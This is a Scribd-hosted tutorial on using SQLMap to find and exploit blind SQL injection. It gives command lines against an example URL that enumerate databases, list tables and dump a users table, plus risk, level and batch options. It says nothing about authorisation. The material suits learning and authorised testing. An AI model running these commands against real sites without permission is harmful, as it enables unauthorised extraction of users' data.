Scribd
Upload
7 views

SQLMap

SQLMap is an open-source tool for automating the detection and exploitation of SQL injection vulnerabilities in web applications, including Blind SQL Injection. It provides various commands to identify targets, enumerate databases, and extract data using Boolean and Time-based techniques. Users can customize their scans with options for risk levels, testing levels, and batch processing to enhance the effectiveness of their SQL injection testing.

Uploaded by

sameerbhatti8162
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
7 views

SQLMap

SQLMap is an open-source tool for automating the detection and exploitation of SQL injection vulnerabilities in web applications, including Blind SQL Injection. It provides various commands to identify targets, enumerate databases, and extract data using Boolean and Time-based techniques. Users can customize their scans with options for risk levels, testing levels, and batch processing to enhance the effectiveness of their SQL injection testing.

Uploaded by

sameerbhatti8162
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

SQLMap is a powerful and popular open-source tool for automating the process of detecting

and exploiting SQL injection vulnerabilities in web applications. It supports various types of SQL
injection, including Blind SQL Injection. Below, I’ll explain how to use SQLMap for both
Boolean-based and Time-based Blind SQL Injection.

Setting Up SQLMap
Installation: SQLMap is typically pre-installed on Kali Linux. If you need to install it, you can
clone it from GitHub:​
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
Usage: SQLMap can be run directly from the command line within its directory using the
following syntax:​
python sqlmap.py [options]

General Steps for Using SQLMap

1.​ Identify Target: Determine the target URL that is vulnerable to SQL injection.
○​ For example: http://example.com/products?id=1

Basic Command Structure: The basic command to test a URL for SQL injection vulnerabilities
is:​
python sqlmap.py -u "http://example.com/products?id=1"

○​ -u: Specifies the target URL.

Using SQLMap for Blind SQL Injection

1. Boolean-based Blind SQL Injection

To test for Boolean-based Blind SQLi, you can simply run the following command:

python sqlmap.py -u "http://example.com/products?id=1" --dbs

●​ --dbs: This option tells SQLMap to enumerate the databases if a SQL injection
vulnerability is found.

SQLMap will automatically perform various Boolean tests to determine if the URL is vulnerable.
If it is, SQLMap will provide information about the databases available.
Example:

If you find a vulnerable endpoint, you can try to extract specific database names:

python sqlmap.py -u "http://example.com/products?id=1" --dbs

SQLMap will return a list of databases it has discovered.

2. Time-based Blind SQL Injection

If you want to force SQLMap to use time-based techniques, you can use the --time-sec
option to specify a delay:

python sqlmap.py -u "http://example.com/products?id=1" --time-sec=5


--dbs

●​ --time-sec=5: This option tells SQLMap to use a 5-second delay to identify


vulnerabilities using time-based attacks.

SQLMap will attempt to exploit time delays to infer information about the database.

Extracting Data with SQLMap

Once you've identified the databases and tables, you can extract information.

1. Listing Tables

To list tables in a specific database (e.g., users_db):

python sqlmap.py -u "http://example.com/products?id=1" -D users_db


--tables

●​ -D: Specifies the database name.


●​ --tables: Lists all tables in the specified database.

2. Dumping Data

To dump data from a specific table (e.g., users):

python sqlmap.py -u "http://example.com/products?id=1" -D users_db -T


users --dump
●​ -T: Specifies the table name.
●​ --dump: Dumps the contents of the specified table.

Additional Options

●​ --risk: Set the risk level (default is 1, maximum is 3). Higher risk levels may test more
advanced injection techniques.
●​ --level: Set the level of tests (default is 1, maximum is 5). Higher levels may test for
more types of injections.
●​ --batch: Run in batch mode, which automates the process without user intervention.

Example Command with Options

Here’s an example command that combines several options:

python sqlmap.py -u "http://example.com/products?id=1" --dbs --level=3


--risk=3 --batch

This command attempts to discover databases with a higher risk and level while running in
batch mode.

Summary

SQLMap is a robust tool that simplifies the process of detecting and exploiting SQL injection
vulnerabilities, including Blind SQL Injection. By using different options and methods, you can
effectively gather information from vulnerable web applications, even when direct feedback is
not available.

●​ Boolean-based Blind SQLi: You can use SQLMap's automatic detection to infer data
based on true/false conditions.
●​ Time-based Blind SQLi: You can force SQLMap to use timing attacks to gather data
based on response times.

You might also like